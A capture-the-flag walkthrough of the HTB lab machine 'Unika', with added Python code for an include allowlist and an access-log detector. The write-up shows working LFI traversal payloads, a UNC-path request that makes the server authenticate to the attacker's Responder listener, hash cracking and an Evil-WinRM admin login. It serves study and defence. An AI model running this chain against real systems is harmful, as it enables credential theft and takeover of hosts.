Unika
Easy · Windows · LFI · NTLMv2 · Hashcat · HTB Starting Point
Beginner-friendly Windows machine teaching LFI via path traversal, UNC path injection to capture NTLMv2 hashes through Responder, and cracking with Hashcat to gain administrator access.
User Flag
ea81b7afddxxxxxxxxxxxxxxxxxxxxxx
Root Flag
f408fc0d9axxxxxxxxxxxxxxxxxxxxxx
01 Reconnaissance

Start with a full Nmap scan to identify open ports and running services.

nmap
$ nmap -sC -sV -oN unika.txt 10.129.95.234

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.52 ((Win64) PHP/8.1.1)
|_http-title: Unika
finding: port 80 open — Apache with PHP on Windows. Single exposed service, focus on web.
02 Web Enumeration

Add the host to /etc/hosts, then browse the site. The URL reveals a page GET parameter that loads language files — classic LFI setup.

hosts + observation
$ echo "10.129.95.234 unika.htb" | sudo tee -a /etc/hosts

# URL observed while browsing:
http://unika.htb/index.php?page=german.php
# => 'page' param loads files — potential LFI
03 LFI — Path Traversal

Test the page parameter with path traversal. On Windows we target the hosts file to confirm the vulnerability, then weaponize with a UNC path.

LFI confirm
# confirm LFI — read the Windows hosts file
http://unika.htb/index.php?page=../../../../windows/system32/drivers/etc/hosts
127.0.0.1 localhost        ← file content returned, LFI confirmed!

# now trigger a UNC path to capture the NTLMv2 hash
http://unika.htb/index.php?page=\\10.10.14.22\share\x
why UNC? When PHP tries to include \\IP\share\x, the Windows SMB client connects to that host and authenticates automatically as the web server's account, answering the server's NTLM challenge with an NTLMv2 response. Responder plays the server, so it records the challenge/response pair (not the password itself); that pair is what gets cracked offline in the next steps.
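As an added example (my own code, not from this writeup and not Unika's PHP source, which the writeup never shows), here is the include pattern behind index.php?page=... modelled in Python: the naive resolver that reproduces the LFI, next to a hardened one that allowlists file names and checks containment. The language directory, the allowed file names and the function names are assumptions.

```python
import posixpath
import re
from pathlib import PurePosixPath

# Assumed layout (not from the writeup): language files live in one directory
# and only these three names are ever meant to be included.
LANG_DIR = PurePosixPath("/var/www/unika/lang")
ALLOWED_PAGES = frozenset({"english.php", "french.php", "german.php"})

# UNC paths (\\host\share or //host/share) and Windows drive letters. On
# Windows, PHP's include() hands either of these to the SMB client or the
# local filesystem, which is what the UNC trick in the writeup relies on.
_REMOTE_OR_ABSOLUTE = re.compile(r"^(\\\\|//|[A-Za-z]:)")


def naive_resolve(page: str) -> str:
    """Models include($_GET['page']) as Unika does it: the client-supplied
    value is used unchanged, so '../../windows/...' and '\\\\host\\share\\x'
    go straight to the filesystem / SMB client."""
    return page


def safe_resolve(page: str) -> PurePosixPath:
    """Hardened resolver. Raises ValueError for anything that is not one of
    the known language files sitting directly inside LANG_DIR."""
    # 1. Reject anything that is not a bare file name: separators of either
    #    flavour, UNC prefixes, drive letters and NUL bytes (older PHP
    #    versions truncated paths at NUL, which defeated suffix checks).
    if "\0" in page or "/" in page or "\\" in page or _REMOTE_OR_ABSOLUTE.match(page):
        raise ValueError(f"rejected page value: {page!r}")
    # 2. Allowlist: only the names the application actually ships.
    if page not in ALLOWED_PAGES:
        raise ValueError(f"unknown page: {page!r}")
    # 3. Containment: normalise without touching the disk and confirm the
    #    result is still a direct child of LANG_DIR. Redundant with (1) and
    #    (2) today; it is the check that still holds if someone later relaxes
    #    the allowlist to "any file in the directory".
    resolved = PurePosixPath(posixpath.normpath(str(LANG_DIR / page)))
    if resolved.parent != LANG_DIR:
        raise ValueError(f"path escapes {LANG_DIR}: {page!r}")
    return resolved


def is_allowed(page: str) -> bool:
    """Boolean wrapper, convenient for request filtering and tests."""
    try:
        safe_resolve(page)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    for candidate in ("german.php",
                      "../../../../windows/system32/drivers/etc/hosts",
                      r"\\10.10.14.22\share\x",
                      "C:\\windows\\win.ini"):
        print(f"{candidate!r:50} naive -> {naive_resolve(candidate)!r:50} "
              f"safe -> {is_allowed(candidate)}")
```

The allowlist alone would stop every payload in this writeup; the containment check is there because allowlists tend to get widened during maintenance, and a second independent check keeps the traversal and UNC cases closed when that happens.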
04 NTLMv2 Capture

Start Responder on tun0 before triggering the UNC request. It will intercept the authentication and save the hash.

responder
# terminal 1 — listener
$ sudo responder -I tun0

# terminal 2 — trigger via curl
$ curl "http://unika.htb/index.php?page=\\\\10.10.14.22\\share\\x"

# responder output:
[SMB] NTLMv2 Hash : administrator::UNIKA:4e6d35...(truncated)
Saved to: /usr/share/responder/logs/SMB-NTLMv2-SSP-10.129.95.234.txt
captured: NTLMv2 hash for administrator. Copy the full hash line to a file.
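From the defender's side, the traversal request in section 03 and the UNC trigger in section 04 both leave a clear trace in the web server's access log. The following added example (my own code, not part of the writeup or the HTB lab) parses Apache combined-format log lines, extracts the page parameter and flags traversal and UNC values, including percent-encoded and double-encoded forms. The log lines are constructed; 10.10.14.22 is the attacker address from the writeup, the other client IP and the function names are assumptions.

```python
import re
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Apache "combined" log layout. Only the fields used below are captured.
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log (not a real capture). Lines 2-5 mirror the requests
# the writeup sends. Apache escapes a literal backslash in the request line
# as "\\", so the raw UNC request on line 5 shows up with doubled backslashes.
SAMPLE_LOG = r"""10.10.14.22 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?page=german.php HTTP/1.1" 200 4210 "-" "Mozilla/5.0"
10.10.14.22 - - [12/Mar/2024:10:01:09 +0000] "GET /index.php?page=../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 824 "-" "Mozilla/5.0"
10.10.14.22 - - [12/Mar/2024:10:01:15 +0000] "GET /index.php?page=..%2F..%2F..%2Fwindows%2Fwin.ini HTTP/1.1" 200 92 "-" "curl/8.5.0"
10.10.14.22 - - [12/Mar/2024:10:02:30 +0000] "GET /index.php?page=%5C%5C10.10.14.22%5Cshare%5Cx HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.10.14.22 - - [12/Mar/2024:10:02:31 +0000] "GET /index.php?page=\\\\10.10.14.22\\share\\x HTTP/1.1" 200 0 "-" "curl/8.5.0"
10.129.95.1 - - [12/Mar/2024:10:03:00 +0000] "GET /index.php?page=french.php HTTP/1.1" 200 4190 "-" "Mozilla/5.0"
"""


def page_value(target: str) -> Optional[str]:
    """Extracts the 'page' query parameter from the request target. parse_qs
    already percent-decodes once; the extra unquote() catches double-encoded
    payloads (%252e%252e%252f -> %2e%2e%2f -> ../)."""
    values = parse_qs(urlsplit(target).query, keep_blank_values=True).get("page")
    if not values:
        return None
    return unquote(values[0])


def classify(value: str) -> Optional[str]:
    """Returns 'unc-path', 'path-traversal' or None for a decoded page value."""
    v = value.replace("\\", "/")          # treat both separator styles alike
    if v.startswith("//"):
        return "unc-path"                 # \\host\share or //host/share
    if "../" in v or v.startswith("/") or re.match(r"^[A-Za-z]:/", v):
        return "path-traversal"           # dot-dot, absolute or drive-letter path
    return None


def scan(log_text: str) -> list:
    """Runs the classifier over every parseable log line and returns findings."""
    findings = []
    for line in log_text.splitlines():
        m = _LOG_RE.match(line)
        if not m:
            continue                      # not a combined-format line
        value = page_value(m["target"])
        if value is None:
            continue                      # request had no 'page' parameter
        kind = classify(value)
        if kind:
            findings.append({"ip": m["ip"], "ts": m["ts"], "kind": kind,
                             "page": value, "status": int(m["status"])})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['ts']}  {f['ip']:<14} {f['kind']:<15} page={f['page']}")
```

A UNC finding is worth treating as higher severity than plain traversal: as the writeup shows, a single such request is enough to make the server hand its account's NTLMv2 response to an external host, so the matching SMB egress (TCP 445 from the web server to that IP) should be blocked at the firewall and alerted on as well.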
05 Hash Cracking

NetNTLMv2 is hash mode 5600 in Hashcat. rockyou.txt cracks this one instantly.

hashcat -m 5600
$ hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

Status: Cracked
ADMINISTRATOR::UNIKA:... : badminton
creds: administrator : badminton
06 Access & Flags

Log in with Evil-WinRM. We land directly as Administrator.

evil-winrm
$ evil-winrm -i 10.129.95.234 -u administrator -p badminton

*Evil-WinRM* PS C:\Users\Administrator> type C:\Users\mike\Desktop\flag.txt
ea81b7afddxxxxxxxxxxxxxxxxxxxxxx

*Evil-WinRM* PS C:\Users\Administrator> type C:\Users\Administrator\Desktop\flag.txt
f408fc0d9axxxxxxxxxxxxxxxxxxxxxx
chain: nmap → LFI discovery → UNC path → Responder → hashcat → evil-winrm admin shell